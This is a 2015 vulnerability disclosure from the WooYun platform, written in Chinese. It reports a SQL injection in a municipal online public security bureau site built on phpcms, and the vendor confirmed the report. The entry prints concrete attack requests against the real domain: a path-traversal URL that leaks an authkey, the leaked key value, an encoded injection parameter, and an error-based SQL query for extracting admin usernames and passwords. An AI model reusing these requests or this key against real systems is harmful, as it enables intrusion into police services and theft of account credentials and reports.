当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129160

漏洞标题:某网上敏感单位注入漏洞 涉及用户信息泄露及平台安全

相关厂商:公安部一所

漏洞作者: 独奏大表哥

提交时间:2015-07-27 09:23

修复时间:2015-09-11 10:26

公开时间:2015-09-11 10:26

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-27: 细节已通知厂商并且等待厂商处理中
2015-07-28: 厂商已经确认,细节仅向厂商公开
2015-08-07: 细节向核心白帽子及相关领域专家公开
2015-08-17: 细节向普通白帽子公开
2015-08-27: 细节向实习白帽子公开
2015-09-11: 细节向公众公开

简要描述:

曲靖市网上公安局sql注入漏洞 局长信箱 违法犯罪举报等敏感信息或被泄露,最好与违法犯罪分开部署。

详细说明:

http://www.qjwsgaj.gov.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
authkey gYHVypmpfOTR9eiNb6XHVERlTdUxQXBV
系统采用phpcms二次开发,局长信箱可以本地跑出来。账号密码破解后同服务器违法犯罪举报系统也有可能受到泄露的风险。

QQ截图20150725094005.png

漏洞证明:

http://www.qjwsgaj.gov.cn/api.php?op=phpsso&code=e1fdUgkCAlQHAQVSUQUDUQBQVQQBAQYABABSUFQCBUFcCQ9fSktcCFhWXAxHRg8ADUQQVF5TG0QEClVRQ0NXFVMUDg8RQVcIUlJBQgJcEwpESxocHFRcWQIHRBofEANZUAUVQhFBVwhSUkFCSWAjKHUgZBVUXkBDCAhTRhcACVtWBxVKCUoAVxtERgcTXQcJVU8ATQNWH0cAFUNFWBECGQUeU1EQEnQ2eHwVFQ5cHxFePFFRXV5dFw0PXVtDQ1YZBE9IQl9AXQkXWFsEDkELBUQKX1tvRFBfBAtRHEMCBFlQFUEOUF9bEBcBGVNIHwAIXwxCHUJWXVNJVhkYBUpPTRUAEw1UElsKUV5HDwBHDwtePENWWFJeVk8SUVBbBhUVUhQOF0kSUB0XSRwDSBA


MySQL Query : SELECT * FROM `gaj`.`v9_member` WHERE `phpssouid` = '' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM wooyun_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#' LIMIT 1
MySQL Error : Table 'gaj.wooyun_admin' doesn't exist
MySQL Errno : 1146
Message : Table 'gaj.wooyun_admin' doesn't exist
Need Help?


QQ截图20150725094005.png

修复方案:

快速升级。最好与违法犯罪分开部署。

版权声明:转载请注明来源 独奏大表哥@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-07-28 10:25

厂商回复:

感谢提交!!
验证确认所描述的问题,已通知其修复。

最新状态:

暂无